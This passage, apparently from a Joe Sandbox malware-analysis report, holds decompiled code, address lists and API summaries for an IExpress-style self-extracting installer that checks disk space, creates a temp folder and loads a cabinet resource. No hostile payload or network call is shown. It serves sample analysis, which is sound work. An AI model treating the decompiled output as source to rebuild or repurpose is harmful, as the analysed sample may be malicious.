                                                                      										_t69 = E00F85467(0xf891e4, 1, 3); // executed
                                                                      										__eflags = _t69;
                                                                      										if(_t69 != 0) {
                                                                      											goto L45;
                                                                      										} else {
                                                                      											_t82 = 0xf891e4;
                                                                      											_t70 = E00F82630(0, 0xf891e4, 1);
                                                                      											__eflags = _t70;
                                                                      											if(_t70 != 0) {
                                                                      												goto L19;
                                                                      											} else {
                                                                      												_t101 = 1;
                                                                      												_t82 = 0xf891e4;
                                                                      												_t71 = E00F85467(0xf891e4, 1, 1);
                                                                      												__eflags = _t71;
                                                                      												if(_t71 != 0) {
                                                                      													goto L45;
                                                                      												} else {
                                                                      													do {
                                                                      														goto L19;
                                                                      														L43:
                                                                      														GetWindowsDirectoryA( &_v268, 0x104);
                                                                      														_push(4);
                                                                      														_t101 = 3;
                                                                      														_t82 =  &_v268;
                                                                      														_t44 = E00F8597D(_t82, _t101, 1);
                                                                      														__eflags = _t44;
                                                                      													} while (_t44 != 0);
                                                                      													goto L2;
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							__eflags = _t35 - 0x5c;
                                                                      							if(_t35 != 0x5c) {
                                                                      								L10:
                                                                      								_t72 = 1;
                                                                      							} else {
                                                                      								__eflags =  *0xf88b3f - _t35; // 0x0
                                                                      								_t72 = 0;
                                                                      								if(__eflags != 0) {
                                                                      									goto L10;
                                                                      								}
                                                                      							}
                                                                      							_t101 = 0;
                                                                      							_t73 = E00F85467(0xf88b3e, 0, _t72);
                                                                      							__eflags = _t73;
                                                                      							if(_t73 != 0) {
                                                                      								L45:
                                                                      								_t38 = 1;
                                                                      							} else {
                                                                      								_t101 = 0x4be;
                                                                      								E00F844B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                      								goto L2;
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t101 = 0x4b1;
                                                                      						E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                      						LocalFree(_t109);
                                                                      						 *0xf89124 = 0x80070714;
                                                                      						goto L2;
                                                                      					}
                                                                      				} else {
                                                                      					_t101 = 0x4b5;
                                                                      					E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                      					 *0xf89124 = E00F86285();
                                                                      					L2:
                                                                      					_t38 = 0;
                                                                      				}
                                                                      				L47:
                                                                      				return E00F86CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                      			}





































                                                                      0x00f855ab
                                                                      0x00f855b2
                                                                      0x00f855c9
                                                                      0x00f855d5
                                                                      0x00f855d9
                                                                      0x00f85600
                                                                      0x00f85605
                                                                      0x00f8560a
                                                                      0x00f8560c
                                                                      0x00f85638
                                                                      0x00f85641
                                                                      0x00f85643
                                                                      0x00f85645
                                                                      0x00f85645
                                                                      0x00f8564c
                                                                      0x00f85652
                                                                      0x00f85657
                                                                      0x00f85659
                                                                      0x00f85696
                                                                      0x00f8569c
                                                                      0x00f8589f
                                                                      0x00f858a7
                                                                      0x00f858ac
                                                                      0x00f858b3
                                                                      0x00f858b5
                                                                      0x00f856a2
                                                                      0x00f856a2
                                                                      0x00f856a8
                                                                      0x00000000
                                                                      0x00f856ae
                                                                      0x00f856ae
                                                                      0x00f856b9
                                                                      0x00f856bf
                                                                      0x00f856c1
                                                                      0x00f856f3
                                                                      0x00f856f3
                                                                      0x00f85705
                                                                      0x00f8570a
                                                                      0x00f85711
                                                                      0x00f85717
                                                                      0x00f85724
                                                                      0x00f85726
                                                                      0x00f85729
                                                                      0x00f85730
                                                                      0x00f85737
                                                                      0x00f8573d
                                                                      0x00f85740
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8572b
                                                                      0x00f8572b
                                                                      0x00f8572e
                                                                      0x00f85742
                                                                      0x00f85742
                                                                      0x00f85745
                                                                      0x00f8576b
                                                                      0x00f8576b
                                                                      0x00000000
                                                                      0x00f85747
                                                                      0x00f85747
                                                                      0x00f8574d
                                                                      0x00f8574f
                                                                      0x00f85771
                                                                      0x00f85771
                                                                      0x00f85773
                                                                      0x00000000
                                                                      0x00f85751
                                                                      0x00f85751
                                                                      0x00f85753
                                                                      0x00000000
                                                                      0x00f85755
                                                                      0x00f8575b
                                                                      0x00f85760
                                                                      0x00f85762
                                                                      0x00000000
                                                                      0x00f85764
                                                                      0x00f85764
                                                                      0x00f85769
                                                                      0x00f8577e
                                                                      0x00f8577e
                                                                      0x00f85781
                                                                      0x00f85788
                                                                      0x00f8578d
                                                                      0x00f8578f
                                                                      0x00f857b2
                                                                      0x00f857b8
                                                                      0x00f857bd
                                                                      0x00f857bf
                                                                      0x00f857cd
                                                                      0x00f857cd
                                                                      0x00f857dd
                                                                      0x00f857e3
                                                                      0x00f857ef
                                                                      0x00f857f5
                                                                      0x00f857f8
                                                                      0x00f8580a
                                                                      0x00f8580a
                                                                      0x00f857fa
                                                                      0x00f85802
                                                                      0x00f85802
                                                                      0x00f8580d
                                                                      0x00f8580f
                                                                      0x00f85830
                                                                      0x00f85836
                                                                      0x00f8583d
                                                                      0x00f8584b
                                                                      0x00f85851
                                                                      0x00f85855
                                                                      0x00f8585a
                                                                      0x00f8585c
                                                                      0x00000000
                                                                      0x00f8585e
                                                                      0x00f8585e
                                                                      0x00000000
                                                                      0x00f8585e
                                                                      0x00f85811
                                                                      0x00f85817
                                                                      0x00f85819
                                                                      0x00f8581f
                                                                      0x00000000
                                                                      0x00f8581f
                                                                      0x00f85791
                                                                      0x00f85797
                                                                      0x00f8579c
                                                                      0x00f8579e
                                                                      0x00000000
                                                                      0x00f857a0
                                                                      0x00f857a9
                                                                      0x00f857ae
                                                                      0x00f857b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f857b0
                                                                      0x00f8579e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85769
                                                                      0x00f85762
                                                                      0x00f85753
                                                                      0x00f8574f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f8572e
                                                                      0x00000000
                                                                      0x00f85864
                                                                      0x00f85864
                                                                      0x00f85864
                                                                      0x00f85717
                                                                      0x00000000
                                                                      0x00f856c3
                                                                      0x00f856c5
                                                                      0x00f856c9
                                                                      0x00f856ce
                                                                      0x00f856d0
                                                                      0x00000000
                                                                      0x00f856d6
                                                                      0x00f856d6
                                                                      0x00f856d8
                                                                      0x00f856dd
                                                                      0x00f856df
                                                                      0x00000000
                                                                      0x00f856e1
                                                                      0x00f856e2
                                                                      0x00f856e4
                                                                      0x00f856e6
                                                                      0x00f856eb
                                                                      0x00f856ed
                                                                      0x00000000
                                                                      0x00f856f3
                                                                      0x00f856f3
                                                                      0x00000000
                                                                      0x00f8586c
                                                                      0x00f85878
                                                                      0x00f8587e
                                                                      0x00f85882
                                                                      0x00f85883
                                                                      0x00f85889
                                                                      0x00f8588e
                                                                      0x00f8588e
                                                                      0x00000000
                                                                      0x00f85896
                                                                      0x00f856ed
                                                                      0x00f856df
                                                                      0x00f856d0
                                                                      0x00f856c1
                                                                      0x00f856a8
                                                                      0x00f8565b
                                                                      0x00f8565b
                                                                      0x00f8565d
                                                                      0x00f85669
                                                                      0x00f85669
                                                                      0x00f8565f
                                                                      0x00f8565f
                                                                      0x00f85665
                                                                      0x00f85667
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85667
                                                                      0x00f8566c
                                                                      0x00f85673
                                                                      0x00f85678
                                                                      0x00f8567a
                                                                      0x00f8589b
                                                                      0x00f8589b
                                                                      0x00f85680
                                                                      0x00f85685
                                                                      0x00f8568c
                                                                      0x00000000
                                                                      0x00f8568c
                                                                      0x00f8567a
                                                                      0x00f8560e
                                                                      0x00f85613
                                                                      0x00f8561a
                                                                      0x00f85620
                                                                      0x00f85626
                                                                      0x00000000
                                                                      0x00f85626
                                                                      0x00f855db
                                                                      0x00f855e0
                                                                      0x00f855e7
                                                                      0x00f855f1
                                                                      0x00f855f6
                                                                      0x00f855f6
                                                                      0x00f855f6
                                                                      0x00f858b7
                                                                      0x00f858c7

                                                                      APIs
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                        • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                        • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                        • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                        • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                        • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                        • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00F855CF
                                                                      • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00F85638
                                                                      • LocalFree.KERNEL32(00000000), ref: 00F8564C
                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F85620
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                        • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                      • GetTempPathA.KERNELBASE(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00F856B9
                                                                      • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00F8571E
                                                                      • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00F85737
                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00F857CD
                                                                      • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00F857EF
                                                                      • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00F85802
                                                                        • Part of subcall function 00F82630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00F82654
                                                                      • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00F85830
                                                                        • Part of subcall function 00F86517: FindResourceA.KERNEL32(00F80000,000007D6,00000005), ref: 00F8652A
                                                                        • Part of subcall function 00F86517: LoadResource.KERNEL32(00F80000,00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00F86538
                                                                        • Part of subcall function 00F86517: DialogBoxIndirectParamA.USER32(00F80000,00000000,00000547,00F819E0,00000000), ref: 00F86557
                                                                        • Part of subcall function 00F86517: FreeResource.KERNEL32(00000000,?,?,00F82EE8,00000000,00F819E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00F86560
                                                                      • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00F85878
                                                                        • Part of subcall function 00F8597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F859A8
                                                                        • Part of subcall function 00F8597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00F859AF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                      • API String ID: 2436801531-337015389
                                                                      • Opcode ID: 90338385525e3856d1e0ba5a6dc04f832afbf9cf77ac0fe1a93160b2ce048e30
                                                                      • Instruction ID: e9d0b85950076327f5867745168dc9044b6e566591497be0af7a2b04e7a98adc
                                                                      • Opcode Fuzzy Hash: 90338385525e3856d1e0ba5a6dc04f832afbf9cf77ac0fe1a93160b2ce048e30
                                                                      • Instruction Fuzzy Hash: 95814C71E04A099BEB20BB708C85BFE72AD9F50B50F4401A6F586D6191EF78CDC6BB11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 324 f8597d-f859b9 GetCurrentDirectoryA SetCurrentDirectoryA 325 f859bb-f859d8 call f844b9 call f86285 324->325 326 f859dd-f85a1b GetDiskFreeSpaceA 324->326 343 f85c05-f85c14 call f86ce0 325->343 328 f85ba1-f85bde memset call f86285 GetLastError FormatMessageA 326->328 329 f85a21-f85a4a MulDiv 326->329 339 f85be3-f85bfc call f844b9 SetCurrentDirectoryA 328->339 329->328 332 f85a50-f85a6c GetVolumeInformationA 329->332 335 f85a6e-f85ab0 memset call f86285 GetLastError FormatMessageA 332->335 336 f85ab5-f85aca SetCurrentDirectoryA 332->336 335->339 337 f85acc-f85ad1 336->337 341 f85ae2-f85ae4 337->341 342 f85ad3-f85ad8 337->342 351 f85c02 339->351 348 f85ae6 341->348 349 f85ae7-f85af8 341->349 342->341 346 f85ada-f85ae0 342->346 346->337 346->341 348->349 353 f85af9-f85afb 349->353 354 f85c04 351->354 355 f85afd-f85b03 353->355 356 f85b05-f85b08 353->356 354->343 355->353 355->356 357 f85b0a-f85b1b call f844b9 356->357 358 f85b20-f85b27 356->358 357->351 360 f85b29-f85b33 358->360 361 f85b52-f85b5b 358->361 360->361 364 f85b35-f85b50 360->364 362 f85b62-f85b6d 361->362 365 f85b6f-f85b74 362->365 366 f85b76-f85b7d 362->366 364->362 367 f85b85 365->367 368 f85b7f-f85b81 366->368 369 f85b83 366->369 370 f85b96-f85b9f 367->370 371 f85b87-f85b94 call f8268b 367->371 368->367 369->367 370->354 371->354
                                                                      C-Code - Quality: 96%
                                                                      			E00F8597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				char _v16;
                                                                      				char _v276;
                                                                      				char _v788;
                                                                      				long _v792;
                                                                      				long _v796;
                                                                      				long _v800;
                                                                      				signed int _v804;
                                                                      				long _v808;
                                                                      				int _v812;
                                                                      				long _v816;
                                                                      				long _v820;
                                                                      				void* __ebx;
                                                                      				void* __esi;
                                                                      				signed int _t46;
                                                                      				int _t50;
                                                                      				signed int _t55;
                                                                      				void* _t66;
                                                                      				int _t69;
                                                                      				signed int _t73;
                                                                      				signed short _t78;
                                                                      				signed int _t87;
                                                                      				signed int _t101;
                                                                      				int _t102;
                                                                      				unsigned int _t103;
                                                                      				unsigned int _t105;
                                                                      				signed int _t111;
                                                                      				long _t112;
                                                                      				signed int _t116;
                                                                      				CHAR* _t118;
                                                                      				signed int _t119;
                                                                      				signed int _t120;
                                                                      
                                                                      				_t114 = __edi;
                                                                      				_t46 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t46 ^ _t120;
                                                                      				_v804 = __edx;
                                                                      				_t118 = __ecx;
                                                                      				GetCurrentDirectoryA(0x104,  &_v276);
                                                                      				_t50 = SetCurrentDirectoryA(_t118); // executed
                                                                      				if(_t50 != 0) {
                                                                      					_push(__edi);
                                                                      					_v796 = 0;
                                                                      					_v792 = 0;
                                                                      					_v800 = 0;
                                                                      					_v808 = 0;
                                                                      					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
                                                                      					__eflags = _t55;
                                                                      					if(_t55 == 0) {
                                                                      						L29:
                                                                      						memset( &_v788, 0, 0x200);
                                                                      						 *0xf89124 = E00F86285();
                                                                      						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                      						_t110 = 0x4b0;
                                                                      						L30:
                                                                      						__eflags = 0;
                                                                      						E00F844B9(0, _t110, _t118,  &_v788, 0x10, 0);
                                                                      						SetCurrentDirectoryA( &_v276);
                                                                      						L31:
                                                                      						_t66 = 0;
                                                                      						__eflags = 0;
                                                                      						L32:
                                                                      						_pop(_t114);
                                                                      						goto L33;
                                                                      					}
                                                                      					_t69 = _v792 * _v796;
                                                                      					_v812 = _t69;
                                                                      					_t116 = MulDiv(_t69, _v800, 0x400);
                                                                      					__eflags = _t116;
                                                                      					if(_t116 == 0) {
                                                                      						goto L29;
                                                                      					}
                                                                      					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
                                                                      					__eflags = _t73;
                                                                      					if(_t73 != 0) {
                                                                      						SetCurrentDirectoryA( &_v276); // executed
                                                                      						_t101 =  &_v16;
                                                                      						_t111 = 6;
                                                                      						_t119 = _t118 - _t101;
                                                                      						__eflags = _t119;
                                                                      						while(1) {
                                                                      							_t22 = _t111 - 4; // 0x2
                                                                      							__eflags = _t22;
                                                                      							if(_t22 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							_t87 =  *((intOrPtr*)(_t119 + _t101));
                                                                      							__eflags = _t87;
                                                                      							if(_t87 == 0) {
                                                                      								break;
                                                                      							}
                                                                      							 *_t101 = _t87;
                                                                      							_t101 = _t101 + 1;
                                                                      							_t111 = _t111 - 1;
                                                                      							__eflags = _t111;
                                                                      							if(_t111 != 0) {
                                                                      								continue;
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _t111;
                                                                      						if(_t111 == 0) {
                                                                      							_t101 = _t101 - 1;
                                                                      							__eflags = _t101;
                                                                      						}
                                                                      						 *_t101 = 0;
                                                                      						_t112 = 0x200;
                                                                      						_t102 = _v812;
                                                                      						_t78 = 0;
                                                                      						_t118 = 8;
                                                                      						while(1) {
                                                                      							__eflags = _t102 - _t112;
                                                                      							if(_t102 == _t112) {
                                                                      								break;
                                                                      							}
                                                                      							_t112 = _t112 + _t112;
                                                                      							_t78 = _t78 + 1;
                                                                      							__eflags = _t78 - _t118;
                                                                      							if(_t78 < _t118) {
                                                                      								continue;
                                                                      							}
                                                                      							break;
                                                                      						}
                                                                      						__eflags = _t78 - _t118;
                                                                      						if(_t78 != _t118) {
                                                                      							__eflags =  *0xf89a34 & 0x00000008;
                                                                      							if(( *0xf89a34 & 0x00000008) == 0) {
                                                                      								L20:
                                                                      								_t103 =  *0xf89a38; // 0x0
                                                                      								_t110 =  *((intOrPtr*)(0xf889e0 + (_t78 & 0x0000ffff) * 4));
                                                                      								L21:
                                                                      								__eflags = (_v804 & 0x00000003) - 3;
                                                                      								if((_v804 & 0x00000003) != 3) {
                                                                      									__eflags = _v804 & 0x00000001;
                                                                      									if((_v804 & 0x00000001) == 0) {
                                                                      										__eflags = _t103 - _t116;
                                                                      									} else {
                                                                      										__eflags = _t110 - _t116;
                                                                      									}
                                                                      								} else {
                                                                      									__eflags = _t103 + _t110 - _t116;
                                                                      								}
                                                                      								if(__eflags <= 0) {
                                                                      									 *0xf89124 = 0;
                                                                      									_t66 = 1;
                                                                      								} else {
                                                                      									_t66 = E00F8268B(_a4, _t110, _t103,  &_v16);
                                                                      								}
                                                                      								goto L32;
                                                                      							}
                                                                      							__eflags = _v816 & 0x00008000;
                                                                      							if((_v816 & 0x00008000) == 0) {
                                                                      								goto L20;
                                                                      							}
                                                                      							_t105 =  *0xf89a38; // 0x0
                                                                      							_t110 =  *((intOrPtr*)(0xf889e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0xf889e0 + (_t78 & 0x0000ffff) * 4));
                                                                      							_t103 = (_t105 >> 2) +  *0xf89a38;
                                                                      							goto L21;
                                                                      						}
                                                                      						_t110 = 0x4c5;
                                                                      						E00F844B9(0, 0x4c5, 0, 0, 0x10, 0);
                                                                      						goto L31;
                                                                      					}
                                                                      					memset( &_v788, 0, 0x200);
                                                                      					 *0xf89124 = E00F86285();
                                                                      					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
                                                                      					_t110 = 0x4f9;
                                                                      					goto L30;
                                                                      				} else {
                                                                      					_t110 = 0x4bc;
                                                                      					E00F844B9(0, 0x4bc, 0, 0, 0x10, 0);
                                                                      					 *0xf89124 = E00F86285();
                                                                      					_t66 = 0;
                                                                      					L33:
                                                                      					return E00F86CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
                                                                      				}
                                                                      			}



































                                                                      0x00f8597d
                                                                      0x00f85988
                                                                      0x00f8598f
                                                                      0x00f8599a
                                                                      0x00f859a6
                                                                      0x00f859a8
                                                                      0x00f859af
                                                                      0x00f859b9
                                                                      0x00f859dd
                                                                      0x00f859e4
                                                                      0x00f859f1
                                                                      0x00f859fe
                                                                      0x00f85a0b
                                                                      0x00f85a13
                                                                      0x00f85a19
                                                                      0x00f85a1b
                                                                      0x00f85ba1
                                                                      0x00f85baf
                                                                      0x00f85bbd
                                                                      0x00f85bd8
                                                                      0x00f85bde
                                                                      0x00f85be3
                                                                      0x00f85bec
                                                                      0x00f85bf0
                                                                      0x00f85bfc
                                                                      0x00f85c02
                                                                      0x00f85c02
                                                                      0x00f85c02
                                                                      0x00f85c04
                                                                      0x00f85c04
                                                                      0x00000000
                                                                      0x00f85c04
                                                                      0x00f85a27
                                                                      0x00f85a3a
                                                                      0x00f85a46
                                                                      0x00f85a48
                                                                      0x00f85a4a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85a64
                                                                      0x00f85a6a
                                                                      0x00f85a6c
                                                                      0x00f85abc
                                                                      0x00f85ac2
                                                                      0x00f85ac9
                                                                      0x00f85aca
                                                                      0x00f85aca
                                                                      0x00f85acc
                                                                      0x00f85acc
                                                                      0x00f85acf
                                                                      0x00f85ad1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85ad3
                                                                      0x00f85ad6
                                                                      0x00f85ad8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85ada
                                                                      0x00f85adc
                                                                      0x00f85add
                                                                      0x00f85add
                                                                      0x00f85ae0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85ae0
                                                                      0x00f85ae2
                                                                      0x00f85ae4
                                                                      0x00f85ae6
                                                                      0x00f85ae6
                                                                      0x00f85ae6
                                                                      0x00f85ae9
                                                                      0x00f85aeb
                                                                      0x00f85af0
                                                                      0x00f85af6
                                                                      0x00f85af8
                                                                      0x00f85af9
                                                                      0x00f85af9
                                                                      0x00f85afb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85afd
                                                                      0x00f85aff
                                                                      0x00f85b00
                                                                      0x00f85b03
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85b03
                                                                      0x00f85b05
                                                                      0x00f85b08
                                                                      0x00f85b20
                                                                      0x00f85b27
                                                                      0x00f85b52
                                                                      0x00f85b52
                                                                      0x00f85b5b
                                                                      0x00f85b62
                                                                      0x00f85b6b
                                                                      0x00f85b6d
                                                                      0x00f85b76
                                                                      0x00f85b7d
                                                                      0x00f85b83
                                                                      0x00f85b7f
                                                                      0x00f85b7f
                                                                      0x00f85b7f
                                                                      0x00f85b6f
                                                                      0x00f85b72
                                                                      0x00f85b72
                                                                      0x00f85b85
                                                                      0x00f85b98
                                                                      0x00f85b9e
                                                                      0x00f85b87
                                                                      0x00f85b8f
                                                                      0x00f85b8f
                                                                      0x00000000
                                                                      0x00f85b85
                                                                      0x00f85b29
                                                                      0x00f85b33
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f85b35
                                                                      0x00f85b48
                                                                      0x00f85b4a
                                                                      0x00000000
                                                                      0x00f85b4a
                                                                      0x00f85b0f
                                                                      0x00f85b16
                                                                      0x00000000
                                                                      0x00f85b16
                                                                      0x00f85a7c
                                                                      0x00f85a8a
                                                                      0x00f85aa5
                                                                      0x00f85aab
                                                                      0x00000000
                                                                      0x00f859bb
                                                                      0x00f859c0
                                                                      0x00f859c7
                                                                      0x00f859d1
                                                                      0x00f859d6
                                                                      0x00f85c05
                                                                      0x00f85c14
                                                                      0x00f85c14

                                                                      APIs
                                                                      • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00F859A8
                                                                      • SetCurrentDirectoryA.KERNELBASE(?), ref: 00F859AF
                                                                      • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00F85A13
                                                                      • MulDiv.KERNEL32(?,?,00000400), ref: 00F85A40
                                                                      • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F85A64
                                                                      • memset.MSVCRT ref: 00F85A7C
                                                                      • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F85A98
                                                                      • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F85AA5
                                                                      • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00F85BFC
                                                                        • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                        • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F84554
                                                                        • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                      • String ID:
                                                                      • API String ID: 4237285672-0
                                                                      • Opcode ID: 8d0616ab3dcf87d02f624871adf19b411f3fdb09de2d8c2e7aed047647d0e990
                                                                      • Instruction ID: ce33b91b0c74f9c25942b46efbaf9f788e2146554266ef4d571621944daf9692
                                                                      • Opcode Fuzzy Hash: 8d0616ab3dcf87d02f624871adf19b411f3fdb09de2d8c2e7aed047647d0e990
                                                                      • Instruction Fuzzy Hash: 8D71A2B1A0061CAFEB15EB64CCC5BFA77ACEB48750F5440AAF505D6140DA749E85AF20
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 374 f84fe0-f8501a call f8468f FindResourceA LoadResource LockResource 377 f85020-f85027 374->377 378 f85161-f85163 374->378 379 f85029-f85051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 f85057-f8505e call f84efd 377->380 379->380 383 f8507c-f850b4 380->383 384 f85060-f85077 call f844b9 380->384 388 f850e8-f85104 call f844b9 383->388 389 f850b6-f850da 383->389 390 f85107-f8510e 384->390 402 f85106 388->402 401 f850dc 389->401 389->402 392 f8511d-f8511f 390->392 393 f85110-f85117 FreeResource 390->393 396 f8513a-f85141 392->396 397 f85121-f85127 392->397 393->392 399 f8515f 396->399 400 f85143-f8514a 396->400 397->396 398 f85129-f85135 call f844b9 397->398 398->396 399->378 400->399 404 f8514c-f85159 SendMessageA 400->404 405 f850e3-f850e6 401->405 402->390 404->399 405->388 405->402
                                                                      C-Code - Quality: 77%
                                                                      			E00F84FE0(void* __edi, void* __eflags) {
                                                                      				void* __ebx;
                                                                      				void* _t8;
                                                                      				struct HWND__* _t9;
                                                                      				int _t10;
                                                                      				void* _t12;
                                                                      				struct HWND__* _t24;
                                                                      				struct HWND__* _t27;
                                                                      				intOrPtr _t29;
                                                                      				void* _t33;
                                                                      				int _t34;
                                                                      				CHAR* _t36;
                                                                      				int _t37;
                                                                      				intOrPtr _t47;
                                                                      
                                                                      				_t33 = __edi;
                                                                      				_t36 = "CABINET";
                                                                      				 *0xf89144 = E00F8468F(_t36, 0, 0);
                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                      				 *0xf89140 = _t8;
                                                                      				if(_t8 == 0) {
                                                                      					return _t8;
                                                                      				}
                                                                      				_t9 =  *0xf88584; // 0x0
                                                                      				if(_t9 != 0) {
                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                      					ShowWindow(GetDlgItem( *0xf88584, 0x841), 5);
                                                                      				}
                                                                      				_t10 = E00F84EFD(0, 0);
                                                                      				if(_t10 != 0) {
